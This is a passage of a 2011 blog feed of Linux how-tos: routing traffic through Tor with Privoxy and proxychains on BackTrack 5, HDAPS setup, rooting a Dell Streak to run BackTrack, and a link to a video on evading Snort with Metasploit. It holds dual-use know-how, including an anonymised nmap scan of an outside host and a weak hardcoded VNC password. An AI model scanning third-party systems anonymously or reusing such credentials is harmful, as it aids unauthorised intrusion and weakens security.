That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-7875226999409547450?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7875226999409547450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7875226999409547450'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-feedingbottle-32-on-backtrack-5.html' title='HOWTO : FeedingBottle 3.2 on Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1172159841353087377</id><published>2011-07-11T23:08:00.009+08:00</published><updated>2011-07-14T16:15:31.790+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='proxychains'/><category scheme='http://www.blogger.com/atom/ns#' term='Tor'/><category scheme='http://www.blogger.com/atom/ns#' term='Privoxy'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : The Onion Router (Tor) on Back|Track 5</title><content type='html'>&lt;b&gt;PART I : Browser&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /etc/apt/sources.list&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line to the file.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;deb http://deb.torproject.org/torproject.org lucid main&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;gpg --keyserver keys.gnupg.net --recv 886DDD89&lt;br /&gt;
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -&lt;br /&gt;
&lt;br /&gt;
apt-get update&lt;br /&gt;
apt-get install tor tor-geoipdb&lt;br /&gt;
apt-get install privoxy&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /etc/privoxy/config&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;forward-socks4a / 127.0.0.1:9050 .&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/privoxy start&lt;br /&gt;
/etc/init.d/tor start&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3a (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you are behind firewall or NAT as well as router, you should append the following line at the configure file.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;forward 192.168.*.*/ .&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the Tor official site to download and install Tor button for Firefox.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.torproject.org/torbutton/index.html.en"&gt;Tor Button Plugin for Firefox&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open Firefox.  Go to "&lt;code&gt;Tools&lt;/code&gt;" -- "&lt;code&gt;Add-ons&lt;/code&gt;" -- "&lt;code&gt;Extensions&lt;/code&gt;".  Select "&lt;code&gt;Torbutton's Preferences&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
(a) At "&lt;code&gt;Proxy Settings&lt;/code&gt;", unclick "&lt;code&gt;Use Polipo&lt;/code&gt;".&lt;br /&gt;
(b) At "&lt;code&gt;Security Settings&lt;/code&gt;", &lt;code&gt;On browser startup, set Tor state to:&lt;/code&gt;" select "&lt;code&gt;Tor&lt;/code&gt;".&lt;br /&gt;
(c) At "&lt;code&gt;Display Settings&lt;/code&gt;", select "&lt;code&gt;Icon&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
** Now, your Firefox will enable Tor on every launch unless you disabled the "Tor Button" on the Firefox.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To check if it works or not.  Go to the following sites to check your Ip address.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://cmyip.com"&gt;http://cmyip.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
or &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://whatismyip.com"&gt;http://whatismyip.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
or&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://check.torproject.org"&gt;http://check.torproject.org&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART II : Console&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get install proxychains elinks&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step b :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /etc/proxychains.conf&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following line :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;socks4  127.0.0.1 9050&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** It should be there.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step c :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Usage :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;proxychains nmap google.com&lt;br /&gt;
proxychains elinks http://cmyip.com&lt;br /&gt;
proxychains elinks http://www.whatismyip.com&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To see your real IP address :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;elinks cmyip.com&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1172159841353087377?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1172159841353087377'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1172159841353087377'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-onion-router-tor-on-backtrack-5.html' title='HOWTO : The Onion Router (Tor) on Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-6829913579419407707</id><published>2011-07-11T22:47:00.002+08:00</published><updated>2011-07-11T22:47:50.794+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Lenovo'/><category scheme='http://www.blogger.com/atom/ns#' term='hdaps'/><title type='text'>HOWTO : Lenovo Active Protection System (HDAPS) on Ubuntu 11.04</title><content type='html'>HDAPS can protect against your laptop (Lenovo ThinkPad) from damaging the hard drive when the laptop is moving around.&lt;br /&gt;
 &lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get install tp-smapi-dkms hdapsd&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo 'tp_smapi' | sudo tee -a /etc/modules&lt;br /&gt;
echo 'hdapsd' | sudo tee -a /etc/modules&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo modprobe tp_smapi&lt;br /&gt;
sudo /etc/init.d/hdapsd restart&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** You just do Step 1 to Step 3 for one time only&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To test if the hdapsd is working or not, you just issue one of the following commands :&lt;br /&gt;
&lt;br /&gt;
(a) &lt;br /&gt;
&lt;code&gt;sudo find /&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, move your laptop and to see if it can halt or not.&lt;br /&gt;
&lt;br /&gt;
(b)&lt;br /&gt;
&lt;code&gt;sudo hdapsd&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, move your laptop and to see if it display "&lt;code&gt;parking&lt;/code&gt;" or not.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
You can adjust the sensitivity of the sensor by editing the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/default/hdapsd&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Locate "&lt;code&gt;SENSITIVITY&lt;/code&gt;" and adjust the value.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-6829913579419407707?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/6829913579419407707'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/6829913579419407707'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-lenovo-active-protection-system.html' title='HOWTO : Lenovo Active Protection System (HDAPS) on Ubuntu 11.04'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5300280317006738370</id><published>2011-07-03T11:25:00.004+08:00</published><updated>2011-07-03T17:08:52.969+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DELL Streak'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><category scheme='http://www.blogger.com/atom/ns#' term='SimpleStreak'/><title type='text'>HOWTO : Yet Another Back|Track 5 on Dell Streak 5</title><content type='html'>I wrote a tutorial for Back|Track 5 on Dell Streak 5 with StreakDroid at &lt;a href="http://samiux.blogspot.com/2011/06/howto-backtrack-5-on-dell-streak-5.html"&gt;here&lt;/a&gt;.  Today, I would like to show you how to use SimpleStreak instead of StreakDroid.  &lt;br /&gt;
&lt;br /&gt;
Why use SimpleStreak?  It is because SimpleStreak uses Official ROM with StreakDroid kernel.  It is less bug comparing with StreakDroid.  Furthermore, SimpleStreak is faster than StreakDroid.&lt;br /&gt;
&lt;br /&gt;
The current version of SimpleStreak is 1.2 at the time of this writing.  You can download it at &lt;a href="http://forum.xda-developers.com/showthread.php?t=1113256"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART I - INSTALLATION OF SIMPLESTREAK&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
First of all, you should make sure you have flashed StreakMod Recovery.  You can download it (MultiRecovryFlasher.v0.7.rar at the time of this writing) at &lt;a href="http://forum.xda-developers.com/showthread.php?t=1000455"&gt;here&lt;/a&gt;.  &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download SimpleStreak 1.2 at &lt;a href="http://forum.xda-developers.com/showthread.php?t=1113256"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Rename it to &lt;code&gt;update.zip&lt;/code&gt; and copy it to the root directory of the SD Card of your Streak.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Switch off your Streak. Long press "&lt;code&gt;Vol Up&lt;/code&gt;" + "&lt;code&gt;Vol down&lt;/code&gt;" and then press "&lt;code&gt;Power on&lt;/code&gt;". Long press those keys until you see the screen is boot up to recovery mode.&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;2. Software upgrade via Update.pkg on SD Card&lt;/code&gt;" by pressing "&lt;code&gt;Camera button&lt;/code&gt;". You will see a "&lt;code&gt;Dell&lt;/code&gt;" logo and a "&lt;code&gt;!&lt;/code&gt;" inside a triangle. Press "&lt;code&gt;Power on&lt;/code&gt;" to the next menu.&lt;br /&gt;
&lt;br /&gt;
Press "&lt;code&gt;Vol up&lt;/code&gt;" or "&lt;code&gt;Vol down&lt;/code&gt;" to move the cursor. Select "&lt;code&gt;wipe the cache partition&lt;/code&gt;" and "&lt;code&gt;wipe data/factory reset&lt;/code&gt;" by pressing "&lt;code&gt;Camera button&lt;/code&gt;" one by one.&lt;br /&gt;
&lt;br /&gt;
After that, press "&lt;code&gt;Vol up&lt;/code&gt;" or "&lt;code&gt;Vol down&lt;/code&gt;" to move the cursor. Select "&lt;code&gt;sdcard:update.zip&lt;/code&gt;" by pressing "&lt;code&gt;Camera button&lt;/code&gt;". Then choose, "&lt;code&gt;Install&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Upon seeing "&lt;code&gt;Installation Completed&lt;/code&gt;", press "&lt;code&gt;Exit&lt;/code&gt;" button on the Streak to return to the previous menu. Then select "&lt;code&gt;reboot system now&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Wait for the Streak to reboot. The first reboot takes longer time. Please be patient.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install the following apps from the Market for the running of Back|Track 5.&lt;br /&gt;
&lt;br /&gt;
(1) &lt;code&gt;Android Terminal Emulator&lt;/code&gt; by Jack Palevich&lt;br /&gt;
(2) &lt;code&gt;Mocha VNC Lite&lt;/code&gt; by MochaSoft&lt;br /&gt;
&lt;br /&gt;
** Step 1 to 4, just do them ONCE.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART II - INSTALL BACK|TRACK 5 ON DELL STREAK&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the official Back|Track 5 ARM from the official site.  Extract it and copy "&lt;code&gt;busybox&lt;/code&gt;" and "&lt;code&gt;installbusybox.sh&lt;/code&gt;" to the root directory of the SD card.&lt;br /&gt;
&lt;br /&gt;
Open the &lt;code&gt;Android Terminal Emulator&lt;/code&gt; and then execute &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;su&lt;br /&gt;
sh installbusybox.sh&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** This step is just doing ONCE unless your ROM is reflashed or updated.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Since the original ARM version of Back|Track 5 cannot be copied to the SD Card due to the size of the image larger than 4GB.  You should download a resized version which is developed by anantshri.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://bit.ly/p1BT5"&gt;bt.7z.001&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://bit.ly/BT5p2"&gt;bt.7z.002&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://bit.ly/BT5p3"&gt;bt.7z.003&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
MD5SUM :&lt;br /&gt;
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001&lt;br /&gt;
247842fd0d3ebb39454f76f4704d1537 bt.7z.002&lt;br /&gt;
f74d2f744434a7182b13287d9f8165e7 bt.7z.003&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 7 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Double click on "&lt;code&gt;bt.7z.001&lt;/code&gt;" to extract.  You will then see the following after the extract.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;bt&lt;br /&gt;
bt.img&lt;br /&gt;
startbt&lt;br /&gt;
stopbt&lt;br /&gt;
installbt.sh&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
You should create a directory of "&lt;code&gt;bt&lt;/code&gt;" (or folder) on the SD Card's root directory.&lt;br /&gt;
&lt;br /&gt;
Copy these files to "&lt;code&gt;/sdcard/bt&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 8 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Run the following commands on the &lt;code&gt;Terminal Emulator&lt;/code&gt; on your Streak.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;su&lt;br /&gt;
cd /sdcard/bt&lt;br /&gt;
sh installbt.sh&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** This step is just doing ONCE unless your ROM is reflashed or updated.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 9 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Run the following commands on the &lt;code&gt;Terminal Emulator&lt;/code&gt; on your Streak.&lt;br /&gt;
&lt;br /&gt;
To start the Back|Track 5 :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;su&lt;br /&gt;
startbt&lt;br /&gt;
bt&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, you will drop to the Back|Track shell&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 10 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Under the Back|Track shell, run the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ui&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** It will start the VNC server on your Streak.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 11 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Press "&lt;code&gt;Home&lt;/code&gt;" on your Streak and then run the apps "&lt;code&gt;Mocha VNC Lite&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Name : BackTrack (or bt for short)&lt;br /&gt;
Address : localhost&lt;br /&gt;
Port : 5901&lt;br /&gt;
Password : 12345678&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, press "&lt;code&gt;Connect&lt;/code&gt;".  You will see the Back|Track 5 launched.&lt;br /&gt;
&lt;br /&gt;
** The setting of the Mocha VNC Lite will be remembered.  That means you just type ONCE.&lt;br /&gt;
&lt;br /&gt;
Press "&lt;code&gt;Home&lt;/code&gt;" to go to the Streak screen.  Back|Track 5 is still running.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 12 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To stop the Back|Track 5, run the following command on the Back|Track shell :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;killui&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** Stop the VNC server.&lt;br /&gt;
&lt;br /&gt;
And then, run the following command :&lt;br /&gt;
&lt;br /&gt;
Exit the &lt;code&gt;Terminal Emulator&lt;/code&gt; and then restart it.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;su&lt;br /&gt;
stopbt&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Now, the Back|Track 5 is stopped running.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 13 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To launch the Back|Track next time, you should repeat the Step 9 to 11.  And stop the Back|Track just repeat Step 12.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Source :&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://forum.xda-developers.com/showthread.php?t=1074169"&gt;BACKTRACK 5 on Xperia X10 chroot&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://forum.xda-developers.com/showthread.php?t=1000455"&gt;Streak - MultiRecoveryFlasher&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://forum.xda-developers.com/attachment.php?attachmentid=593348&amp;d=1305148126"&gt;The method of resize the Back|Track 5 image to 3.3GB&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Remarks :&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(1) Make sure you run "&lt;code&gt;killui&lt;/code&gt;" and "&lt;code&gt;stopbt&lt;/code&gt;" when BackTrack 5 is not required.  &lt;br /&gt;
&lt;br /&gt;
(2) The aircrack-ng cannot be ran properly as the interface is eth0 instead of wlan0.  No monitor mode and no injection.&lt;br /&gt;
&lt;br /&gt;
(3) Download &lt;code&gt;MultiRecoveryFlasher&lt;/code&gt; at the Source above.  Then, flash "&lt;code&gt;StreakMod-Recovery&lt;/code&gt;" if you cannot flash the SimpleStreak.  Under Ubuntu, you are not required to install any driver but you need to run the program in root.  Go to root by the following command :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo -sH&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5300280317006738370?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5300280317006738370'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5300280317006738370'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-yet-another-backtrack-5-on-dell.html' title='HOWTO : Yet Another Back|Track 5 on Dell Streak 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5897752478539039867</id><published>2011-07-02T10:11:00.001+08:00</published><updated>2011-07-02T10:12:34.722+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Snort'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Does Snort really protect your network?</title><content type='html'>Before watching the video below which is prepared by TOX1C, I always think that Snort is powerful and protective.  Now, I know that Snort cannot protect your network from being hacked by skilled hackers.&lt;br /&gt;
&lt;br /&gt;
Enjoy!&lt;br /&gt;
&lt;br /&gt;
&lt;iframe src="http://player.vimeo.com/video/24455465?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="225" frameborder="0"&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/24455465"&gt;Pissing on Snort with Metasploit&lt;/a&gt; from &lt;a href="http://vimeo.com/user7268211"&gt;T0X1C&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5897752478539039867?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5897752478539039867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5897752478539039867'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/does-snort-really-protect-your-network.html' title='Does Snort really protect your network?'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-859097731672781779</id><published>2011-06-01T13:33:00.029+08:00</published><updated>2011-06-14T08:49:44.561+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DELL Streak'/><category scheme='http://www.blogger.com/atom/ns#' term='StreakDroid'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Back|Track 5 on Dell Streak 5</title><content type='html'>First of all, you should root your Dell Streak 5.  I have tried many methods to root my Dell Streak 5 but unsuccess.  Those methods require Windows system and some require to use an apps.  I nearly to brick my Streak.  Fortunately, I re-flashed the recovery image and rescued my Streak.&lt;br /&gt;
&lt;br /&gt;
Now, I would like to show you how to root your Streak by mean of installation of a custom ROM - StreakDroid which is developed by DJ Steve.  The current StreakDroid is 2.0.0 and based on stock ROM 2.3.3.  However, this version has some bugs (please see Known Issue below).  Therefore, I use the previous version 1.9.0 which is based on stock ROM 2.2.2 instead.  Version 1.9.0 is more stable then 2.0.0.&lt;br /&gt;
&lt;br /&gt;
Installation of custom ROM for the root is the easiest way to do so.  If you do so, your Streak cannot be unrooted and the warranty will be voided.  The ROM will be the StreakDroid 2.0.0 or 1.9.0 depends on your choice.&lt;br /&gt;
&lt;br /&gt;
Installation of Back|Track 5 does not harm your Streak as it use VNC to load the Back|Track 5 image.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART I - INSTALL CUSTOM ROM TO DELL STREAK&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the StreakDroid 2.0.0.&lt;br /&gt;
&lt;code&gt;wget http://mirror2.streakdroid.com/StreakDroid5-2.0.zip&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
OR&lt;br /&gt;
&lt;br /&gt;
Dowload the StreakDroid 1.9.0.&lt;br /&gt;
&lt;code&gt;wget http://downloads.streakdroid.com/djsteve/update-1.9.0.zip&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Rename it to &lt;code&gt;update.zip&lt;/code&gt; and copy it to the SD card of your Streak.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Switch off your Streak.  Long press "&lt;code&gt;Vol Up&lt;/code&gt;" + "&lt;code&gt;Vol down&lt;/code&gt;" and then press "&lt;code&gt;Power on&lt;/code&gt;".  Long press those keys until you see the screen is boot up to recovery mode.&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;2. Software upgrade via Update.pkg on SD Card&lt;/code&gt;" by pressing "&lt;code&gt;Camera button&lt;/code&gt;".  You will see a "&lt;code&gt;Dell&lt;/code&gt;" logo and a "&lt;code&gt;!&lt;/code&gt;" inside a triangle.  Press "&lt;code&gt;Power on&lt;/code&gt;" to the next menu.&lt;br /&gt;
&lt;br /&gt;
Press "&lt;code&gt;Vol up&lt;/code&gt;" or "&lt;code&gt;Vol down&lt;/code&gt;" to move the cursor.  Select "&lt;code&gt;wipe the cache partition&lt;/code&gt;" and "&lt;code&gt;wipe data/factory reset&lt;/code&gt;" by pressing "&lt;code&gt;Camera button&lt;/code&gt;" one by one.  &lt;br /&gt;
&lt;br /&gt;
After that, press "&lt;code&gt;Vol up&lt;/code&gt;" or "&lt;code&gt;Vol down&lt;/code&gt;" to move the cursor.  Select "&lt;code&gt;sdcard:update.zip&lt;/code&gt;" by pressing "&lt;code&gt;Camera button&lt;/code&gt;".  Then choose, "&lt;code&gt;Install&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Upon seeing "&lt;code&gt;Installation Completed&lt;/code&gt;", press "&lt;code&gt;Exit&lt;/code&gt;" button on the Streak to return to the previous menu.  Then select "&lt;code&gt;reboot system now&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Wait for the Streak to reboot.  The first reboot takes longer time.  Please be patient.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
You can now to install the following apps from the Market.&lt;br /&gt;
&lt;br /&gt;
(1) &lt;code&gt;sysctl config&lt;/code&gt;&lt;br /&gt;
(2) &lt;code&gt;chainfire3D&lt;/code&gt;&lt;br /&gt;
(3) &lt;a href="http://www.multiupload.com/18ECNP4UH1"&gt;Plugins for chainfire3D&lt;/a&gt; - (Don't extract the .zip) Installed and select nNvidia&lt;br /&gt;
(4) &lt;code&gt;Remote Desktop&lt;/code&gt; by Kolakowski Damian&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install the following apps from the Market for the running of Back|Track 5.&lt;br /&gt;
&lt;br /&gt;
